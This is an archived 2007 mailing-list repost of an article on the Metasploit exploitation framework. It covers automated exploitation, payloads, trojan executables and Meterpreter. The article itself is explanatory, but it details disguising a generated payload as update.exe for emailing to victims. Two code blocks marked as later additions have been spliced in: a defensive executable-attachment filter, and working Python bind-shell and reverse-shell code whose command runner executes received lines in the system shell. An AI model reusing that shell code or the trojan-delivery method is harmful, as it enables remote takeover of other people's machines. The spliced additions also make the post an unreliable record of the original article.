[Infowarrior] - Metasploit: Join the Arms Race

Richard Forno rforno at infowarrior.org
Tue Jul 10 12:01:30 UTC 2007


Metasploit: Join the Arms Race
July 3, 2007
By Paul Rubens

http://www.enterprisenetworkingplanet.com/netsecur/article.php/3687001


What's the biggest threat to your organization's network? Arguably, it's
Metasploit, an easy-to-use exploitation framework that reduces the job of
compromising computers to a simple point-and-click exercise.

"Metasploit is a genius concept to standardize the development and use of
exploits so anyone can use them," says Mati Aharoni, one of the experts
behind BackTrack 2, a security-oriented Linux distribution based on Slax.
"It is a brilliant system, especially for penetration testers, and it has
become the number one tool for every security and analysis person."

The problem is that Metasploit is freely available to hackers as well as
security pros. It's a bit like an arms race, then: if the baddies are armed
with Metasploit, you had better make sure that you have it too. If not,
you'll be the digital equivalent of outgunned.

One of the biggest innovations in the latest version of Metasploit,
Framework 3, is the db_autopwn feature: a database-driven process that takes
the hosts and open ports found by a network scan (or the findings of an
imported vulnerability scan), matches them against the exploit modules, and
launches every matching exploit, compromising as many machines as it can
without further input from the operator. This is certainly worth trying out
on your own network, because if it succeeds it means you have security
problems that anyone running Framework 3 will find without any hacking
skills at all. (If you are going to do this to your own network, read up on
it first, and preview the matching exploits with db_autopwn's -t switch
before launching them with -e: some exploits will crash a vulnerable service
or machine rather than compromise it cleanly, so do not fire it blindly at
production systems.) There are other powerful penetration testing programs
that can "hack" a network automatically, notably Core Security's Core
Impact, but none that are freely available like Metasploit.

For added flexibility, Metasploit also lets users build their own bespoke
attacks. A hacker may discover, using any number of methods (including
scanning, or simply asking staff members), that you have a machine on your
network susceptible to one of the nearly 200 exploits currently included in
Framework 3, perhaps a buffer overflow which allows an attacker to insert
and execute arbitrary code. The next question is what arbitrary code, or
payload, the hacker should insert. The particular overflow may offer just
800 bytes in which to place code, but this is more than enough for just
about all of the payloads supplied with Metasploit: the larger ones, such as
Meterpreter, are staged, so only a small first stage has to fit in the
overflow, and it then pulls the rest across the network.

So once an attacker has found a vulnerability and selected a payload, and
after supplying a few other parameters, such as the IP address of the target
machine or of his own machine (depending on the payload), he is ready to run
the exploit.

Or is he? What happens if the attacker has no obvious way of reaching the
machine he wants to compromise directly? One answer is Metasploit's
little-known option X, the X output format of its msfpayload generator.
Instead of delivering the payload through a vulnerability, Metasploit wraps
the chosen payload, complete with all the parameters it requires, into a
standalone Windows Portable Executable (.exe) file. No bug in the target is
needed: the victim running the file is the exploit. So all a hacker needs to
do is give the file some suitably innocuous name like update.exe and email it
to the victim. He'll need some social engineering skills to get the recipient
to double-click it, and that, as they say, will be that: the machine will
run the payload and be well and truly pwned.

Your users will doubtless have been trained never to click on .exe files
they receive by email, and with any luck your email filters will stop them
being delivered anyway. But it's a simple matter to change a file extension
to get past a filter that looks only at the file name, and if social
engineering can be used to get someone to double-click a file, it can
certainly be used to get someone to rename a file as an executable first.
Filters that inspect the content of an attachment are harder to fool: a
Windows executable is recognizable from its header whatever it is called.
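The content check just described, as an added example that is not part of the original article or of Metasploit: a Python function that recognises a Windows Portable Executable from its own header (the 'MZ' DOS stub and the 'PE\0\0' signature that the e_lfanew field at offset 0x3c points to), and a mail-filter style verdict built on it. The attachment names, the fake mailbox and the minimal PE header are constructed for the demo; the header carries no code and will not run.

```python
"""Recognise a Windows executable by content, not by its file name."""
import struct

PE_SIGNATURE = b"PE\0\0"


def looks_like_pe(data):
    """Return True if data starts a Windows Portable Executable.

    A PE begins with a DOS stub whose first two bytes are 'MZ'; the 32-bit
    little-endian field at offset 0x3c (e_lfanew) gives the offset of the
    'PE\\0\\0' signature of the real header. Neither depends on the file
    name, so a payload generated as update.exe and renamed update.txt
    still matches.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # A pointer past the end means a truncated file or a plain DOS program,
    # not a PE; refuse rather than raise on a hostile or short attachment.
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def attachment_verdict(filename, data):
    """Gateway decision: block on what the bytes are, then on what the
    sender chose to call them, so neither trick alone gets through."""
    if looks_like_pe(data):
        return "block"
    if filename.lower().endswith((".exe", ".scr", ".com", ".pif")):
        return "block"  # executable extension, whatever the content
    return "allow"


def scan_attachments(attachments):
    """Apply the verdict to a list of (filename, bytes) pairs."""
    return [(name, attachment_verdict(name, data)) for name, data in attachments]


def constructed_pe():
    """Constructed minimal PE header for the demo: an MZ stub, e_lfanew
    pointing at 0x80 and the PE signature there. No real code inside."""
    e_lfanew = 0x80
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2))  # DOS header up to e_lfanew
    hdr += struct.pack("<I", e_lfanew)
    hdr += b"\0" * (e_lfanew - len(hdr))         # pad the DOS stub
    hdr += PE_SIGNATURE + b"\0" * 20             # signature + COFF placeholder
    return bytes(hdr)


# Constructed mailbox: the same trojan under its own name and renamed to
# slip past an extension-only filter, beside a harmless text note.
SAMPLE_ATTACHMENTS = [
    ("update.exe", constructed_pe()),
    ("update.txt", constructed_pe()),
    ("notes.txt", b"Please rename the attachment to update.exe and run it.\n"),
]

if __name__ == "__main__":
    for name, verdict in scan_attachments(SAMPLE_ATTACHMENTS):
        print(name, verdict)
```

The same check belongs on the extracted members of archives and on anything a mail client will happily unpack, since a renamed .exe inside a .zip is the next trick once the bare attachment is blocked.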

So it's important to realize that, with the help of Metasploit, making this
type of Trojan file is really not hard at all. If you are aware of this then
at least you can think about the steps you need to take to prevent your
users from falling victim to one.

If they do fall victim, what kind of payloads might be run on their system
using Metasploit? When a machine is compromised by a Metasploit user, what
are the implications?

Metasploit has payloads for a variety of OSes including Windows, Linux, OS
X, BSD and Solaris. The most basic payload is a simple bind shell: the
payload opens a listening port on the victim machine, the attacker's machine
connects to it and gets a command prompt. There's also a reverse shell, which
causes the compromised machine to connect back out to the attacker and hand
over a command shell; because that connection is outbound, it works even
where a firewall blocks new inbound connections to the victim, and it is the
one to expect when the payload arrives as an emailed executable. With the
command shell the hacker can do anything someone sitting at the machine
could do, with the privileges of whatever ran the payload: the current user
for a Trojan that was double-clicked, or the service account, often SYSTEM,
when the exploited bug is in a Windows service.
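The two payload shapes above, as an added Python illustration that is not Metasploit's code and does not reproduce its wire protocol: the same victim-side command loop is wired up once as a bind shell (victim listens, attacker connects in) and once as a reverse shell (attacker listens, victim connects out), both over loopback. The line-oriented framing with a sentinel, the loopback addresses and the fake executor's "corp\jdoe" and "WS-042" answers are constructed for the demo; run_command shows where a real payload would hand the line to /bin/sh or cmd.exe.

```python
"""Bind shell versus reverse shell: the same command loop, opposite
connection direction."""
import socket
import subprocess
import threading

SENTINEL = "--end-of-output--"  # constructed framing, not Metasploit's


def run_command(line):
    """Run one command line through the local shell and return its output.
    A real payload hands the attacker cmd.exe or /bin/sh; this is a stand-in."""
    proc = subprocess.run(line, shell=True, capture_output=True,
                          text=True, timeout=10)
    return proc.stdout + proc.stderr


def serve_shell(conn, executor=run_command):
    """Victim side, shared by both shapes: read a command line, execute it,
    send the output followed by SENTINEL, until 'exit' or disconnect.
    Returns the number of commands executed."""
    conn.settimeout(10)
    executed = 0
    with conn, conn.makefile("r") as reader:
        for line in reader:
            cmd = line.strip()
            if not cmd or cmd == "exit":
                break
            reply = executor(cmd).rstrip("\n") + "\n" + SENTINEL + "\n"
            conn.sendall(reply.encode())
            executed += 1
    return executed


def drive_shell(conn, commands):
    """Attacker side: send each command, collect its output up to SENTINEL."""
    conn.settimeout(10)
    outputs = []
    with conn, conn.makefile("r") as reader:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
            chunk = []
            for line in reader:
                if line.rstrip("\n") == SENTINEL:
                    break
                chunk.append(line.rstrip("\n"))
            outputs.append("\n".join(chunk))
        conn.sendall(b"exit\n")
    return outputs


def bind_shell(executor=run_command, port=0):
    """Bind-shell shape: the victim opens a listening port and waits for the
    attacker to connect IN. Returns (thread, port); port 0 lets the OS pick."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def victim():
        conn, _ = srv.accept()
        srv.close()
        serve_shell(conn, executor)

    thread = threading.Thread(target=victim, daemon=True)
    thread.start()
    return thread, srv.getsockname()[1]


def reverse_shell(attacker_host, attacker_port, executor=run_command):
    """Reverse-shell shape: the victim connects OUT to the attacker's
    listener, which is why it passes firewalls that only block inbound."""
    conn = socket.create_connection((attacker_host, attacker_port))
    return serve_shell(conn, executor)


def fake_executor(cmd):
    """Constructed stand-in for run_command so the demo is deterministic."""
    return {"whoami": "corp\\jdoe", "hostname": "WS-042"}.get(cmd, "unknown command")


def demo(executor=fake_executor):
    """Run both shapes over loopback; return what the attacker collected."""
    # Bind shell: victim listens first, attacker connects in.
    victim, port = bind_shell(executor)
    attacker = socket.create_connection(("127.0.0.1", port))
    bind_out = drive_shell(attacker, ["whoami", "hostname"])
    victim.join(5)

    # Reverse shell: attacker listens first, victim connects out.
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    victim = threading.Thread(target=reverse_shell,
                              args=("127.0.0.1", listener.getsockname()[1], executor),
                              daemon=True)
    victim.start()
    conn, _ = listener.accept()
    listener.close()
    reverse_out = drive_shell(conn, ["whoami"])
    victim.join(5)
    return {"bind": bind_out, "reverse": reverse_out}


if __name__ == "__main__":
    print(demo())
```

The defensive point is in the direction: a bind shell is a new listening port on the victim, which inbound filtering and a port scan of your own hosts will catch, while a reverse shell is just another outbound connection, so egress filtering and watching for unexpected outbound sessions are what detect it.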

But there are also more insidious payloads which cause an exploited machine
to download an .exe file from a given URL and execute it, or which inject a
VNC server onto a compromised machine and connect back to the attacker,
providing him with a full color remote desktop experience on the compromised
machine.

Perhaps the most flexible payload is the Meterpreter "uber-payload," a kind
of extensible command shell which an attacker can use to get up to all kinds
of mischief. With a Meterpreter shell in place an attacker can use upload
and download commands to move files to and from the compromised computer
from his own machine. The SAM Meterpreter extension (at the time of writing
only available in the older Metasploit Framework 2) also provides a
"gethashes" command to dump the password hashes from the exploited machine's
SAM onto the attacker's machine for cracking.

It's pretty clear from this that Metasploit, in the wrong hands, could be
used to do a great deal of damage to the machines under your care, so do
yourself a favor and make sure the odds aren't stacked against you. Get
yourself a copy (it runs on Linux or Windows, and even the tiny handheld
Nokia N800 Linux device) and see what vulnerabilities it can exploit before
someone else does. You can use this knowledge to put things right. Other
Metasploit users exploring your network might not be so kind.
